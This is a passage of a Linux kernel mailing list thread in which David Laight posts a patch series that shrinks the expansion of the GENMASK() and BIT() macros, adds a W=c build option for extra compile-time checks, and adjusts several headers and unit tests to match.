GENMASK() and FIELD_PREP()) it lets additional checks be added
while there are still 'false positives' without breaking normal builds.
Signed-off-by: David Laight <david.laight.linux@gmail.com>
---
scripts/Makefile.warn | 12 ++++++++++--
1 file changed, 10 insertions(+), 2 deletions(-)
diff --git a/scripts/Makefile.warn b/scripts/Makefile.warn
index 68e6fafcb80c..e8a799850973 100644
--- a/scripts/Makefile.warn
+++ b/scripts/Makefile.warn
@@ -2,8 +2,9 @@
# ==========================================================================
# make W=... settings
#
-# There are four warning groups enabled by W=1, W=2, W=3, and W=e
-# They are independent, and can be combined like W=12 or W=123e.
+# There are five warning groups enabled by W=c, W=1, W=2, W=3, and W=e
+# They are independent, and can be combined like W=12 or W=123e,
+# except that W=1 implies W=c.
# ==========================================================================
# Default set of warnings, always enabled
@@ -109,6 +110,13 @@ KBUILD_CFLAGS += $(call cc-option,-Wenum-conversion)
KBUILD_CFLAGS += -Wunused
+#
+# W=c - Expensive compile-time checks, implied by W=1
+#
+ifneq ($(findstring c, $(KBUILD_EXTRA_WARN))$(findstring 1, $(KBUILD_EXTRA_WARN)),)
+KBUILD_CPPFLAGS += -DKBUILD_EXTRA_WARNc
+endif
+
#
# W=1 - warnings which may be relevant and do not occur too often
#
--
2.39.5
|
{
"author": "david.laight.linux@gmail.com",
"date": "Wed, 21 Jan 2026 14:57:19 +0000",
"thread_id": "20260121145731.3623-1-david.laight.linux@gmail.com.mbox.gz"
}
|
lkml
|
[PATCH next 00/14] bits: De-bloat expansion of GENMASK()
|
|
From: David Laight <david.laight.linux@gmail.com>
Compile-time tests being added to BIT() make it an 'integer constant
expression' rather than a pre-processor expression for W=1 builds.
Change the FRAC_ACC != BDS_UNIT test to use static_assert() so the code
compiles.
Signed-off-by: David Laight <david.laight.linux@gmail.com>
---
.../kernels/fixedbds/fixedbds_1.0/ia_css_fixedbds_param.h | 5 ++---
1 file changed, 2 insertions(+), 3 deletions(-)
diff --git a/drivers/staging/media/atomisp/pci/isp/kernels/fixedbds/fixedbds_1.0/ia_css_fixedbds_param.h b/drivers/staging/media/atomisp/pci/isp/kernels/fixedbds/fixedbds_1.0/ia_css_fixedbds_param.h
index f7e5669d5125..31bce7b2650e 100644
--- a/drivers/staging/media/atomisp/pci/isp/kernels/fixedbds/fixedbds_1.0/ia_css_fixedbds_param.h
+++ b/drivers/staging/media/atomisp/pci/isp/kernels/fixedbds/fixedbds_1.0/ia_css_fixedbds_param.h
@@ -13,9 +13,8 @@
#define BDS_UNIT 8
#define FRAC_LOG 3
#define FRAC_ACC BIT(FRAC_LOG)
-#if FRAC_ACC != BDS_UNIT
-#error "FRAC_ACC and BDS_UNIT need to be merged into one define"
-#endif
+static_assert(FRAC_ACC == BDS_UNIT,
+ "FRAC_ACC and BDS_UNIT need to be merged into one define");
struct sh_css_isp_bds_params {
int baf_strength;
--
2.39.5
|
{
"author": "david.laight.linux@gmail.com",
"date": "Wed, 21 Jan 2026 14:57:21 +0000",
"thread_id": "20260121145731.3623-1-david.laight.linux@gmail.com.mbox.gz"
}
|
lkml
|
[PATCH next 00/14] bits: De-bloat expansion of GENMASK()
|
From: David Laight <david.laight.linux@gmail.com>
The expansion of GENMASK() is a few hundred bytes; this is often multiplied
when the value is passed to other #defines (e.g. FIELD_PREP).
Part of the size is due to the compile-time check (for reversed arguments),
the rest from the way the value is defined.
Nothing in these patches changes the code the compiler sees - just the
way the constants get defined.
Changing GENMASK(hi, lo) to (2 << hi) - (1 << lo) is left for further study.
I looked at getting the compiler to check for reversed arguments using
(0 >> (hi - lo)) instead of const_true(lo > hi). While checking that it
was always optimised away I discovered that you don't get an error message
if the values are only 'compile time constants'; worse, clang starts
throwing code away, generating an empty function for:
int f(u32 x) {int n = 32; return x >> n; }
(Shifts by more than width are 'undefined behaviour', so what clang
does is technically valid - but not friendly or expected.)
So I added extra checks to both GENMASK() and BITxxx() to detect this
at compile time. But this bloats the output - the opposite of what I
was trying to achieve.
However these are all compile-time checks that are actually unlikely
to detect anything, they don't need to be done on every build.
I've mitigated this by adding W=c (cf W=[123e]) to the main Makefile
(adding -DKBUILD_EXTRA_WARNc) and defaulting to W=c for W=1 builds.
Adding checks to BIT() makes it no longer a pre-processor constant
so it can no longer be used in #if statements (when W=c is set).
This required minor changes to 3 files.
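A sketch of the kind of change those files needed: once BIT() stops being a preprocessor-evaluable expression, a #if test on it no longer parses, but an equivalent C-level static_assert() still works (the BIT() stand-in below is a simplification for illustration, not the kernel's definition):

```c
#define MY_BIT(nr) (1u << (nr))   /* stand-in for BIT(); the real macro gains C-only checks */

#define FRAC_LOG 3
#define FRAC_ACC MY_BIT(FRAC_LOG)
#define BDS_UNIT 8

/*
 * The old form:
 *   #if FRAC_ACC != BDS_UNIT
 *   #error "..."
 *   #endif
 * only works while FRAC_ACC is a preprocessor expression. The C-level
 * check below keeps working even when BIT() contains sizeof()-based checks.
 */
_Static_assert(FRAC_ACC == BDS_UNIT,
	       "FRAC_ACC and BDS_UNIT need to be merged into one define");

unsigned int frac_acc(void) { return FRAC_ACC; }
```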
At some point the definition of BIT() was moved to vdso/bits.h
(followed by that for BIT_ULL()), but then the fixed size BIT_Unn()
were added to bits.h.
I've moved BIT_ULL() back to linux/bits.h and made the version of
BIT() in linux/bits.h be preferred if both files get included.
Note that the x86-64 allmodconfig build succeeds if vdso/bits.h
is empty - everything includes linux/bits.h first.
I found two non-vdso files that included vdso/bits.h and changed
them to use linux/bits.h.
GENMASK_U8() and BIT_U8() cast their result to (u8); this isn't
a good idea. While the 'type of the expression' is 'u8', integer
promotion makes the 'type of the value' 'signed int'.
This means that in code like:
u64 v = BIT_U8(7) << 24;
the value is sign extended and all the high bits are set.
Instead change the type of the xxx_U8/U16 macros to 'unsigned int'
so that the sign extension cannot happen.
The compile-time check on the bit number is still present.
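The promotion pitfall can be reproduced in plain C. A minimal userspace sketch (the old-style (u8) cast is a reconstruction for illustration, not the kernel's exact macro; the intermediate casts keep the example free of undefined behaviour while showing the same effect, relying on two's-complement conversion as gcc and clang implement it):

```c
#include <stdint.h>

typedef uint8_t u8;
typedef uint64_t u64;

/* Old style: result cast to u8, as BIT_U8() had it (reconstruction) */
#define BIT_U8_OLD(nr) ((u8)(1u << (nr)))
/* New style: result kept as unsigned int, so promotion stays unsigned */
#define BIT_U8_NEW(nr) (1u << (nr))

u64 old_style(void)
{
	/*
	 * BIT_U8_OLD(7) is (u8)0x80; integer promotion turns it into a
	 * signed int before the shift, so bit 31 becomes the sign bit and
	 * the conversion to u64 sign-extends, setting all the high bits.
	 */
	int shifted = (int)((unsigned int)BIT_U8_OLD(7) << 24);
	return (u64)shifted;
}

u64 new_style(void)
{
	return (u64)(BIT_U8_NEW(7) << 24); /* unsigned all the way: bit 31 only */
}
```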
For assembler files where GENMASK() can be used for constants
the expansions from uapi/linux/bits.h were used.
However these contain BITS_PER_LONG and BITS_PER_LONG_LONG which
make no sense since the assembler doesn't have sized arithmetic.
Replace them so that GENMASK(hi, lo) expands to ((2 << (hi)) - (1 << (lo))), which has
the correct value without knowing the size of the integers.
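That identity can be checked in ordinary C, where unsigned wrap-around mirrors the assembler's fixed-width arithmetic (a sketch, not the in-tree macro):

```c
/*
 * Width-agnostic mask of bits h..l inclusive, mirroring the proposed
 * assembler expansion: (2 << h) reaches one past the top requested bit,
 * and subtracting (1 << l) clears the bits below l. For h == 31 the
 * 2u << 31 wraps to 0 in 32-bit unsigned arithmetic, and 0 - 1 gives
 * all ones, so the full-width mask also comes out right.
 */
#define GENMASK_ASM(h, l) ((2u << (h)) - (1u << (l)))

unsigned int mask_7_4(void)  { return GENMASK_ASM(7, 4); }
unsigned int mask_31_0(void) { return GENMASK_ASM(31, 0); }
```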
The kunit tests all check compile-time values.
I've changed them to use BUILD_BUG_ON().
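The idea behind such compile-time tests can be sketched in plain C using the negative-bitfield trick (a sketch only; the kernel's BUILD_BUG_ON()/BUILD_BUG_ON_ZERO() definitions differ in detail):

```c
/*
 * Compile-time check usable inside a constant expression: when 'cond'
 * is true the anonymous struct gets a negative bitfield width, which is
 * a compile error; when it is false, the expression evaluates to 0.
 */
#define CHECK_ZERO(cond) ((int)(sizeof(struct { int pad : 1 - 2 * !!(cond); }) * 0))

/* A toy checked BIT(): the zero-valued check is added into the constant */
#define BIT_CHECKED(nr) (CHECK_ZERO((nr) >= 32) + (1u << (nr)))

unsigned int bit7(void) { return BIT_CHECKED(7); }
/* BIT_CHECKED(32) would fail to compile rather than silently misbehave. */
```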
David Laight (14):
overflow: Reduce expansion of __type_max()
kbuild: Add W=c for additional compile time checks
media: videobuf2-core: Use static_assert() for sanity check
media: atomisp: Use static_assert() for sanity check
ixgbevf: Use C test for PAGE_SIZE > IXGBE_MAX_DATA_PER_TXD
asm-generic: include linux/bits.h not vdso/bits.h
x86/tlb: include linux/bits.h not vdso/bits.h
bits: simplify GENMASK_TYPE()
bits: Change BIT_U8/16() and GENMASK_U8/16() to have unsigned values
bits: Fix assembler expansions of GENMASK_Uxx() and BIT_Uxx()
bits: Strengthen compile-time tests in GENMASK() and BIT()
bits: move the definitions of BIT() and BIT_ULL() back to linux/bits.h
test_bits: Change all the tests to be compile-time tests
test_bits: include some invalid input tests for GENMASK_INPUT_CHECK()
arch/x86/include/asm/tlb.h | 2 +-
.../media/common/videobuf2/videobuf2-core.c | 6 +-
.../net/ethernet/intel/ixgbevf/ixgbevf_main.c | 17 +--
.../fixedbds_1.0/ia_css_fixedbds_param.h | 5 +-
include/asm-generic/thread_info_tif.h | 2 +-
include/linux/bits.h | 88 ++++++++----
include/linux/overflow.h | 2 +-
include/vdso/bits.h | 2 +-
lib/tests/test_bits.c | 130 +++++++++++-------
scripts/Makefile.warn | 12 +-
10 files changed, 162 insertions(+), 104 deletions(-)
--
2.39.5
|
From: David Laight <david.laight.linux@gmail.com>
asm/tlb.h isn't part of the vdso, use the linux/bits.h header.
Signed-off-by: David Laight <david.laight.linux@gmail.com>
---
arch/x86/include/asm/tlb.h | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/arch/x86/include/asm/tlb.h b/arch/x86/include/asm/tlb.h
index 866ea78ba156..e61c6de73e70 100644
--- a/arch/x86/include/asm/tlb.h
+++ b/arch/x86/include/asm/tlb.h
@@ -7,7 +7,7 @@ static inline void tlb_flush(struct mmu_gather *tlb);
#include <asm-generic/tlb.h>
#include <linux/kernel.h>
-#include <vdso/bits.h>
+#include <linux/bits.h>
#include <vdso/page.h>
static inline void tlb_flush(struct mmu_gather *tlb)
--
2.39.5
|
{
"author": "david.laight.linux@gmail.com",
"date": "Wed, 21 Jan 2026 14:57:24 +0000",
"thread_id": "20260121145731.3623-1-david.laight.linux@gmail.com.mbox.gz"
}
|
lkml
|
[PATCH next 00/14] bits: De-bloat expansion of GENMASK()
|
|
From: David Laight <david.laight.linux@gmail.com>
Casting the value of BIT_U*() and GENMASK_U8() to (u8) is pointless.
Although it changes what typeof(BIT_U8()) returns, the value will
always be promoted to 'signed int' before it is used.
Instead force the expression to be an unsigned type.
Avoids unexpected sign extension from, for example:
u64 v = BIT_U8(7) << 24;
Fix the KUNIT tests to match.
Signed-off-by: David Laight <david.laight.linux@gmail.com>
---
include/linux/bits.h | 6 +++---
lib/tests/test_bits.c | 12 ++++++------
2 files changed, 9 insertions(+), 9 deletions(-)
diff --git a/include/linux/bits.h b/include/linux/bits.h
index 697318f2a47d..23bc94815569 100644
--- a/include/linux/bits.h
+++ b/include/linux/bits.h
@@ -44,8 +44,8 @@
* - GENMASK_U32(33, 15): doesn't fit in a u32
*/
#define GENMASK_TYPE(t, h, l) \
- ((t)(GENMASK_INPUT_CHECK(h, l) + \
- ((t)-1 << (l) & (t)-1 >> (BITS_PER_TYPE(t) - 1 - (h)))))
+ ((unsigned int)GENMASK_INPUT_CHECK(h, l) + \
+ ((t)-1 << (l) & (t)-1 >> (BITS_PER_TYPE(t) - 1 - (h))))
#define GENMASK(h, l) GENMASK_TYPE(unsigned long, h, l)
#define GENMASK_ULL(h, l) GENMASK_TYPE(unsigned long long, h, l)
@@ -67,7 +67,7 @@
#define BIT_INPUT_CHECK(type, nr) \
BUILD_BUG_ON_ZERO(const_true((nr) >= BITS_PER_TYPE(type)))
-#define BIT_TYPE(type, nr) ((type)(BIT_INPUT_CHECK(type, nr) + BIT_ULL(nr)))
+#define BIT_TYPE(type, nr) ((unsigned int)BIT_INPUT_CHECK(type, nr) + ((type)1 << (nr)))
#define BIT_U8(nr) BIT_TYPE(u8, nr)
#define BIT_U16(nr) BIT_TYPE(u16, nr)
diff --git a/lib/tests/test_bits.c b/lib/tests/test_bits.c
index ab88e50d2edf..55be8230f9e7 100644
--- a/lib/tests/test_bits.c
+++ b/lib/tests/test_bits.c
@@ -9,20 +9,20 @@
#define assert_type(t, x) _Generic(x, t: x, default: 0)
-static_assert(assert_type(u8, BIT_U8(0)) == 1u);
-static_assert(assert_type(u16, BIT_U16(0)) == 1u);
+static_assert(assert_type(unsigned int, BIT_U8(0)) == 1u);
+static_assert(assert_type(unsigned int, BIT_U16(0)) == 1u);
static_assert(assert_type(u32, BIT_U32(0)) == 1u);
static_assert(assert_type(u64, BIT_U64(0)) == 1ull);
-static_assert(assert_type(u8, BIT_U8(7)) == 0x80u);
-static_assert(assert_type(u16, BIT_U16(15)) == 0x8000u);
+static_assert(assert_type(unsigned int, BIT_U8(7)) == 0x80u);
+static_assert(assert_type(unsigned int, BIT_U16(15)) == 0x8000u);
static_assert(assert_type(u32, BIT_U32(31)) == 0x80000000u);
static_assert(assert_type(u64, BIT_U64(63)) == 0x8000000000000000ull);
static_assert(assert_type(unsigned long, GENMASK(31, 0)) == U32_MAX);
static_assert(assert_type(unsigned long long, GENMASK_ULL(63, 0)) == U64_MAX);
-static_assert(assert_type(u8, GENMASK_U8(7, 0)) == U8_MAX);
-static_assert(assert_type(u16, GENMASK_U16(15, 0)) == U16_MAX);
+static_assert(assert_type(unsigned int, GENMASK_U8(7, 0)) == U8_MAX);
+static_assert(assert_type(unsigned int, GENMASK_U16(15, 0)) == U16_MAX);
static_assert(assert_type(u32, GENMASK_U32(31, 0)) == U32_MAX);
static_assert(assert_type(u64, GENMASK_U64(63, 0)) == U64_MAX);
--
2.39.5
|
{
"author": "david.laight.linux@gmail.com",
"date": "Wed, 21 Jan 2026 14:57:26 +0000",
"thread_id": "20260121145731.3623-1-david.laight.linux@gmail.com.mbox.gz"
}
|
lkml
|
[PATCH next 00/14] bits: De-bloat expansion of GENMASK()
|
|
From: David Laight <david.laight.linux@gmail.com>
thread_info_tif.h isn't part of the vdso, use the linux/bits.h header.
Signed-off-by: David Laight <david.laight.linux@gmail.com>
---
include/asm-generic/thread_info_tif.h | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/include/asm-generic/thread_info_tif.h b/include/asm-generic/thread_info_tif.h
index da1610a78f92..afdc23204674 100644
--- a/include/asm-generic/thread_info_tif.h
+++ b/include/asm-generic/thread_info_tif.h
@@ -2,7 +2,7 @@
#ifndef _ASM_GENERIC_THREAD_INFO_TIF_H_
#define _ASM_GENERIC_THREAD_INFO_TIF_H_
-#include <vdso/bits.h>
+#include <linux/bits.h>
/* Bits 16-31 are reserved for architecture specific purposes */
--
2.39.5
|
{
"author": "david.laight.linux@gmail.com",
"date": "Wed, 21 Jan 2026 14:57:23 +0000",
"thread_id": "20260121145731.3623-1-david.laight.linux@gmail.com.mbox.gz"
}
|
lkml
|
[PATCH next 00/14] bits: De-bloat expansion of GENMASK()
|
|
From: David Laight <david.laight.linux@gmail.com>
The assembler only supports one size of signed integer, so expressions
using BITS_PER_LONG (etc.) cannot be guaranteed to be correct.
Use ((2 << (h)) - (1 << (l))) for all assembler GENMASK() expansions and
add definitions of BIT_Uxx() as (1 << (nr)).
Note that 64bit results are (probably) only correct for 64bit builds
and 128bit results will never be valid.
Signed-off-by: David Laight <david.laight.linux@gmail.com>
---
include/linux/bits.h | 33 +++++++++++++++++----------------
1 file changed, 17 insertions(+), 16 deletions(-)
diff --git a/include/linux/bits.h b/include/linux/bits.h
index 23bc94815569..43631a334314 100644
--- a/include/linux/bits.h
+++ b/include/linux/bits.h
@@ -19,14 +19,6 @@
*/
#if !defined(__ASSEMBLY__)
-/*
- * Missing asm support
- *
- * GENMASK_U*() and BIT_U*() depend on BITS_PER_TYPE() which relies on sizeof(),
- * something not available in asm. Nevertheless, fixed width integers is a C
- * concept. Assembly code can rely on the long and long long versions instead.
- */
-
#include <linux/build_bug.h>
#include <linux/compiler.h>
#include <linux/overflow.h>
@@ -46,6 +38,7 @@
#define GENMASK_TYPE(t, h, l) \
((unsigned int)GENMASK_INPUT_CHECK(h, l) + \
((t)-1 << (l) & (t)-1 >> (BITS_PER_TYPE(t) - 1 - (h))))
+#endif
#define GENMASK(h, l) GENMASK_TYPE(unsigned long, h, l)
#define GENMASK_ULL(h, l) GENMASK_TYPE(unsigned long long, h, l)
@@ -56,9 +49,10 @@
#define GENMASK_U64(h, l) GENMASK_TYPE(u64, h, l)
#define GENMASK_U128(h, l) GENMASK_TYPE(u128, h, l)
+#if !defined(__ASSEMBLY__)
/*
- * Fixed-type variants of BIT(), with additional checks like GENMASK_TYPE(). The
- * following examples generate compiler warnings due to -Wshift-count-overflow:
+ * Fixed-type variants of BIT(), with additional checks like GENMASK_TYPE().
+ * The following examples generate compiler warnings from BIT_INPUT_CHECK().
*
* - BIT_U8(8)
* - BIT_U32(-1)
@@ -68,21 +62,28 @@
BUILD_BUG_ON_ZERO(const_true((nr) >= BITS_PER_TYPE(type)))
#define BIT_TYPE(type, nr) ((unsigned int)BIT_INPUT_CHECK(type, nr) + ((type)1 << (nr)))
+#endif /* defined(__ASSEMBLY__) */
#define BIT_U8(nr) BIT_TYPE(u8, nr)
#define BIT_U16(nr) BIT_TYPE(u16, nr)
#define BIT_U32(nr) BIT_TYPE(u32, nr)
#define BIT_U64(nr) BIT_TYPE(u64, nr)
-#else /* defined(__ASSEMBLY__) */
+#if defined(__ASSEMBLY__)
/*
- * BUILD_BUG_ON_ZERO is not available in h files included from asm files,
- * disable the input check if that is the case.
+ * The assembler only supports one size of signed integer rather than
+ * the fixed width integer types of C.
+ * There is also no method for reporting invalid input.
+ * Errors in .h files will usually be picked up when compiled into C files.
+ *
+ * Define type-size agnostic definitions that generate the correct value
+ * provided it can be represented by the assembler.
*/
-#define GENMASK(h, l) __GENMASK(h, l)
-#define GENMASK_ULL(h, l) __GENMASK_ULL(h, l)
-#endif /* !defined(__ASSEMBLY__) */
+#define GENMASK_TYPE(t, h, l) ((2 << (h)) - (1 << (l)))
+#define BIT_TYPE(type, nr) (1 << (nr))
+
+#endif /* defined(__ASSEMBLY__) */
#endif /* __LINUX_BITS_H */
--
2.39.5
|
{
"author": "david.laight.linux@gmail.com",
"date": "Wed, 21 Jan 2026 14:57:27 +0000",
"thread_id": "20260121145731.3623-1-david.laight.linux@gmail.com.mbox.gz"
}
|